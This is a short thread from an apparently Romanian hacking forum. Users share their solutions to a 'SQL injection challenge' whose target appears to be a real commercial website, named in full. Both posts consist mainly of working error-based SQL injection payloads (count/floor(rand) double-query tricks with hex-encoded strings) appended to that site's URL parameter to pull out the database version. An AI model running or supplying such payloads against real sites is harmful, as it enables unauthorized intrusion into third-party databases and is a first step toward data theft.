Jump to content
.darky

[EASY] SQLi(njection) challenge #6

Recommended Posts

Tot ca s-a terminat acest challange am terminat mai tarziu , am spus sa va public syntaxa facuta de mine :P

http://www.mangaldeep.co.in/news1.php?id=3 and (select 1 from (select count(*),concat((select(select concat(0x3c666f6e7420636f6c6f723d2223333338303030223e5368656c6f203c2f666f6e743e,cast(version() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Link to comment
Share on other sites

  • Active Members
Tot ca s-a terminat acest challange am terminat mai tarziu , am spus sa va public syntaxa facuta de mine :P

http://www.mangaldeep.co.in/news1.php?id=3 and (select 1 from (select count(*),concat((select(select concat(0x3c666f6e7420636f6c6f723d2223333338303030223e5368656c6f203c2f666f6e743e,cast(version() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Scuze da sintaxa aia nu e facuta de tine ;) este folosita de tine

Uite si sintaxa folosita de mine


http://www.mangaldeep.co.in/news1.php?id=3 and @a:=1 LIKE(select @a from(select count(@a),concat((select concat(0x3a,@@version,':danyweb09::')),floor(rand(0)*1337))sele from information_schema.tables group by sele)plm)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...